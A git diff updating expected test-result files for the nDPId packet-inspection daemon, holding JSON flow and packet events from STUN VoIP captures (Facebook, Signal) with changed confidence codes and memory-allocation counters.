+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1629291451242,"flow_last_seen":1629291461336,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":7404,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1629291461336,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":75,"source":"stun_facebook.pcapng","alias":"nDPId-test","packets-captured":75,"packets-processed":75,"total-skipped-flows":0,"total-l4-payload-len":7404,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1629291461336} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 75/75 
@@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879826 bytes -~~ total memory freed........: 5879826 bytes -~~ total allocations/frees...: 118191/118191 +~~ total memory allocated....: 6013460 bytes +~~ total memory freed........: 6013460 bytes +~~ total allocations/frees...: 120953/120953 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 838 chars diff --git a/test/results/stun_signal.pcapng.out b/test/results/stun_signal.pcapng.out index dd2391052..fa44bcbde 100644 --- a/test/results/stun_signal.pcapng.out +++ b/test/results/stun_signal.pcapng.out 
@@ -14,32 +14,32 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1636901936070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936070,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnVBAAEAR9NXAqAypI563p5peAbsAHIqqAAEAACESpEJaZmI0ZFV3bVhyejU="} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901936083,"flow_last_seen":1636901936083,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936083,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1636901936083,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1636901936083,"pkt":"mt9Y+uvcCL6sCxduCABFAABMbq0AAOABw2wjnrenwKgMqQMDpcEAAAAARQAAMJ1NQAAgERTZwKgMqSOet6e4ZAG7ABzz8QABAAAhEqRCME1BM2doTDV4K0Zu"} 
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901936083,"flow_last_seen":1636901936083,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936083,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901936083,"flow_last_seen":1636901936083,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936083,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1636901936087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901936087,"pkt":"mt9Y+uvcCL6sCxduCABFAABwLztAAOARwqojnrenwKgMqQ2WuGQAXLAaAQEAQCESpEJjaDExN25ZQXk2MTAAIAAIAAEPY3w9RVEAAQAIAAEucV0v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAATCHshI"} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1636901936087,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1636901936087,"pkt":"mt9Y+uvcCL6sCxduCABFAABMbq4AAOABw2sjnrenwKgMqQMDpcEAAAAARQAAMJ1QQAAdERfWwKgMqSOet6eaXgG7AByKqgABAAAhEqRCWmZiNGRVd21Ycno1"} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1636901936087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901936087,"pkt":"mt9Y+uvcCL6sCxduCABFAABwLzxAAOMRv6kjnrenwKgMqQ2Wml4AXJaEAQEAQCESpEJkOSt6R0JMc3JIbisAIAAIAAEPYnw9RVEAAQAIAAEucF0v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAAT07Zjq"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1636901936120,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901936120,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVJAAEAR9MvAqAypI563p5peDZYAJPVxAAMACCESpEI3Q1lCTmVMaEVzcmUAGQAEEQAAAA=="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1636901936135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901936135,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVNAAEAR9MrAqAypI563p7hkAbsAJNuCAAMACCESpEI0YTJQbEl4dk1TUisAGQAEEQAAAA=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1636901936135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901936135,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVRAAEAR9MnAqAypI563p5peAbsAJPWkAAMACCESpEJKS0hOWUJHNGV5VkoAGQAEEQAAAA=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936070,"flow_last_seen":1636901936138,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936138,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936070,"flow_last_seen":1636901936138,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936138,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1636901936144,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901936144,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVVAAEAR9MjAqAypI563p7hkDZYAJNmuAAMACCESpEIwWE1VcCtxUS9rUlMAGQAEEQAAAA=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936144,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1636901936144,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936144,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1636901936144,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1636901936150,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1636901936150,"pkt":"mt9Y+uvcCL6sCxduCABFAABUbrkAAOABw1gjnrenwKgMqQMDpckAAAAARQAAOJ1TQAAgERTLwKgMqSOet6e4ZAG7ACTbggADAAghEqRCNGEyUGxJeHZNU1IrABkABBEAAAA="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1636901936292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936292,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwdWhAAEAR0YbAqAyprP15f5peS2YAHHHgAAEAACESpEJTQ2RLNjF0alZXNms="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1636901936040,"flow_last_seen":1636901936292,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901936292,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1636901936040,"flow_last_seen":1636901936292,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901936292,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1636901936292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936292,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwdWlAAEAR0YXAqAyprP15f7hkS2YAHGpqAAEAACESpEJ0a0VLMmtzWEZzMm8="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1636901936316,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936316,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnWJAAEAR9MPAqAypI563p7hkAbsAHPPxAAEAACESpEIwTUEzZ2hMNXgrRm4="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1636901936320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936320,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnWNAAEAR9MLAqAypI563p5peAbsAHIqqAAEAACESpEJaZmI0ZFV3bVhyejU="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936320,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1636901936320,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936320,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1636901936320,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1636901936411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1636901936411,"pkt":"mt9Y+uvcCL6sCxduCABFgAA80K0AACYRz7Ws\/Xl\/wKgMqUtmml4AKJ+iAQEADCESpEJTQ2RLNjF0alZXNmsAIAAIAAEPYnw9RVE="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1636901936415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1636901936415,"pkt":"mt9Y+uvcCL6sCxduCABFgAA8TlEAACURUxKs\/Xl\/wKgMqUtmuGQAKJgrAQEADCESpEJ0a0VLMmtzWEZzMm8AIAAIAAEPY3w9RVE="} 
-00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901936065,"flow_last_seen":1636901936889,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901936889,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901936065,"flow_last_seen":1636901936889,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901936889,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956886,"flow_last_seen":1636901956886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956886,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1636901956886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956886,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuBAAEAR80XAqAypI563p6g8DZYAHMrjAAEAACESpEJ3MXhZWGxMSlFtK2Q="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956886,"flow_last_seen":1636901956886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956886,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956886,"flow_last_seen":1636901956886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956886,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956899,"flow_last_seen":1636901956899,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956899,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1636901956899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956899,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuFAAEAR80TAqAypI563p6g8AbsAHKfZAAEAACESpEJpNFFIaG51aVlxTjI="} 
-00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956899,"flow_last_seen":1636901956899,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956899,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956899,"flow_last_seen":1636901956899,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956899,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956900,"flow_last_seen":1636901956900,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956900,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1636901956900,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956900,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwevFAAEARy\/3AqAyprP15f6g8S2YAHDXLAAEAACESpEJuRGJFSkJreUFwVW4="} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1636901956903,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901956903,"pkt":"mt9Y+uvcCL6sCxduCABFAABwP61AAOARsjgjnrenwKgMqQ2WqDwAXIeiAQEAQCESpEJ3MXhZWGxMSlFtK2QAIAAIAAEPlHw9RVEAAQAIAAEuhl0v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAARTHy4\/"} 
